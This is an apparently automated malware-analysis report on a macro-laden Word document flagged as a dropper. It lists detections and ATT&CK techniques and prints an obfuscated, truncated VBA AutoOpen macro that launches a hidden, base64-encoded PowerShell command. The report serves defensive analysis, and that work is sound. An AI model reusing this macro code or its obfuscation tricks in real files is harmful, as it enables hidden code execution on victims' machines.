Verdict: MALICIOUS (risk score 242)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document carrying a VBA macro. Its Autoopen procedure calls hAENkvA(uKATZzc), which invokes Shell() with vbHide, so the child process runs without a visible window. The command line is assembled from concatenated string fragments, and its first character is produced by Chr(vbKeyP) so that the literal "powershell" never appears in the source; folded, the visible fragments read "PowersHeLL -WinDowsTyle hidden -e <base64>". That base64 is the UTF-16LE PowerShell command, and its recoverable head decodes to ` &( $SheLLiD[1]+$ShElLId[13]+'x')( (("{49}{93}{5}...`: $ShellId is "Microsoft.PowerShell", so [1]+[13]+'x' spells iex, and the {n} placeholders are the start of a format string whose pieces are presumably reordered at runtime (the -f operator pattern). Because the macro preview is cut off before the encoded command ends, neither the second-stage URL nor the final command line is recoverable from this report; the downloader role is inferred from that pattern and corroborated by the ClamAV name 'Doc.Dropper.Agent'. The single extracted URL, http://schemas.openxmlformats.org/drawingml/2006/main, is an OOXML schema namespace from the document body and is not a network indicator. No specific family could be identified.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6567439-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.Agent-6567439-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL). Shell() call in VBA; here it is invoked with vbHide, so the spawned process has no visible window.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN). AutoOpen macro; the recovered source names it Sub Autoopen(), which Word runs as soon as the document is opened with macros enabled.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat for this sample: a VBA project was in fact recovered (macros.bas under Extracted artifacts), so this marker duplicates the AutoOpen finding rather than adding independent evidence.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML schema namespace present in ordinary Office documents, not a download or command-and-control indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17417 bytes | 9fbea150be9ddb94c2d76f30858ed3c9d873572e70a4703b33e912c2e390fc99 |

Preview: first 1,000 lines of the extracted script as shown by the analyzer (cut off mid-string at the end). The Atn()/Log() arithmetic on never-assigned variables is junk that does not feed the Shell() argument; the string assignments in WoSzmR are the payload.

```vb
Attribute VB_Name = "acQGhGswzVn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uKATZzc()
On Error Resume Next
IjXEAu = Atn(58429 * CInt(7921) + 54929 - 76099)
KBSHr = 56301 + _
Log(86018) - CPvYXs / Atn(10094) / UNwQXb / zoBYp
MiYIFO = Atn(78833 * CInt(71392) + 56421 - 57740)
BIsON = 14238 + _
Log(99740) - uwJqi / Atn(43485) / iBTTqE / wqlWQ
uKATZzc = WoSzmR + lIRjE + tOLGlC + wlpBDUSvQ + rfNRi + dmjdw + oFJbjiw + acNGjotZHM + hSovdX + jThqQL
dQMrj = Atn(80990 * CInt(28924) + 28791 - 68734)
ljBMuk = 4301 + _
Log(76084) - mTjnRJ / Atn(75633) / wKBcq / iiikSH
End Function
Sub Autoopen()
On Error Resume Next
HXwPhm = Atn(79345 * CInt(84162) + 17639 - 26456)
wbizzc = 89974 + _
Log(64195) - mQEiIu / Atn(79904) / iPAjj / iwhXj
hAENkvA (uKATZzc)
wLpwN = Atn(59131 * CInt(28645) + 25493 - 69832)
BplLBq = 35937 + _
Log(31658) - mzVNt / Atn(26103) / RVzAQ / KKwab
End Sub
Function hAENkvA(zDiQplJLmZ)
On Error Resume Next
Uijcj = Atn(86647 * CInt(26830) + 20718 - 96841)
EniRQ = 94683 + _
Log(50001) - wvjJNt / Atn(26501) / UzibMb / LvcGU
nHcqJOZs = zWCUSDQrhn + Chr(vbKeyP) + YoSoOcPVU
UfCGwR = Atn(22764 * CInt(43744) + 98004 - 76491)
kVcfY = 22017 + _
Log(32637) - OzYQjX / Atn(16307) / YTVoqF / dQjCQc
zNXCEpbrGb = QYoDUw + Shell(lwjuXGA + nHcqJOZs + pnchwEXBzIi + zDiQplJLmZ + NOozaLX, vbHide)
MVJQq = Atn(82667 * CInt(98092) + 68900 - 74741)
LTGnwO = 43430 + _
Log(66902) - nnDdzW / Atn(59786) / wPrIAK / mCHPj
End Function

Attribute VB_Name = "iojkcWwBj"
Function WoSzmR()
On Error Resume Next
CkqWR = Atn(32250 * CInt(75904) + 33522 - 10190)
twfwL = 76141 + _
Log(85308) - bopfbE / Atn(60207) / EQmzE / lvAhq
zoDmITAH = "owersHeLL -W" + "inDow" + "sTyle hidden -e" + " IAAmACgAIAA" + "kAFMAaA" + "BlAEwATA" + "BpAEQAWwAx"
TQluG = Atn(36143 * CInt(84765) + 98353 - 7522)
AjRMLb = 48827 + _
Log(44376) - mrQMW / Atn(60003) / AlMjv / wiXKDv
hjYwtwzrFZM = "AF0AKw" + "AkAFMAaABFAGwA" + "TABJA" + "GQAWwAxA" + "DMAXQArACc" + "AeAAn"
IMjwW = Atn(31947 * CInt(11083) + 61276 - 84838)
KWdYES = 5176 + _
Log(7658) - OzRGm / Atn(39739) / WjjpAY / wAaLTp
tZPthYw = "ACkAKAAgACg" + "AKAAiAHsANAA" + "5AH0AewA5ADMA" + "fQB7ADUA" + "fQB7ADE" + "AMAA5AH0Ae" + "wA4ADYAfQB7ADMA"
ZbInC = Atn(24310 * CInt(34941) + 9882 - 86098)
UGojZ = 82465 + _
Log(10021) - ckuWwC / Atn(93962) / siXdGi / IpXJT
lKzfRtjjk = "NgB9AHsAN" + "AA1AH0AewAyAD" + "QAfQB7ADIAN" + "gB9AHsAOAA1A" + "H0AewAy" + "ADcAf" + "QB7ADUA" + "MQB9AHsAMQAw" + "ADUAfQB7ADgAOAB"
ITRqSV = Atn(87943 * CInt(69183) + 94156 - 48529)
VRrEM = 6491 + _
Log(59769) - qQTnh / Atn(29873) / lsfrC / mJURcf
uwsTA = "9AHsAMgAxAH0Ae" + "wA4ADEAfQB7AD" + "IAOQB9" + "AHsAMQA0AH" + "0AewA0ADcAfQB7A" + "DUANwB9AHs"
hDCvFO = Atn(14776 * CInt(78682) + 82740 - 18550)
msDcTo = 62220 + _
Log(69741) - IjBEFX / Atn(53853) / HXnjYA / nOXhS
nRXTO = "AMQAzAH" + "0AewA2" + "ADEAfQB7ADEAM" + "AAzAH0A" + "ewAyADUAf" + "QB7ADUANgB9AH" + "sAMwA" + "xAH0AewA3AH0"
VuijF = Atn(19214 * CInt(58785) + 19580 - 81421)
ksDVzB = 95747 + _
Log(81409) - mYhTWN / Atn(26529) / ioFQwR / npSVA
jzwqnr = "AewA3ADA" + "AfQB7ADYAfQB7A" + "DQAMwB9AHsA" + "OAA0AH0A" + "ewA5A" + "DEAfQB7A" + "DEAMAA4" + "AH0AewAyAD" + "MAfQB7ADk" + "ANgB9AHsANgA"
zZRrC = Atn(82946 * CInt(39371) + 59738 - 52671)
Qhzjjn = 52206 + _
Log(24352) - rSAVl / Atn(30016) / akiIjc / VozPbT
UaLpf = "1AH0AewA0ADAA" + "fQB7AD" + "YAMwB9AHsANAA2A" + "H0AewAxADA" + "AMQB9AHs"
tMCCo = Atn(66846 * CInt(98475) + 71039 - 69264)
NFzIuw = 6115 + _
Log(62082) - QQkwSC / Atn(76742) / drkYzt / wGzTw
ofQAOXTKw = "AMgAwAH0Ae" + "wA4ADI" + "AfQB7A" + "DMAMwB9AHsAMQA" + "xADEAf" + "QB7ADUAOQB9AHsA" + "MwA3AH0" + "AewAzA" + "DkAfQ"
npAiud = Atn(57012 * CInt(64597) + 51688 - 84596)
jzDFJP = 68976 + _
Log(99433) - rVtzb / Atn(27992) / zKozj / vdakOY
iQXIVwnUwQ = "B7ADk" + "AOAB9A" + "HsAMgB9AH" + "sANQA4AH0Ae" + "wA3ADIAfQ ... (truncated)
```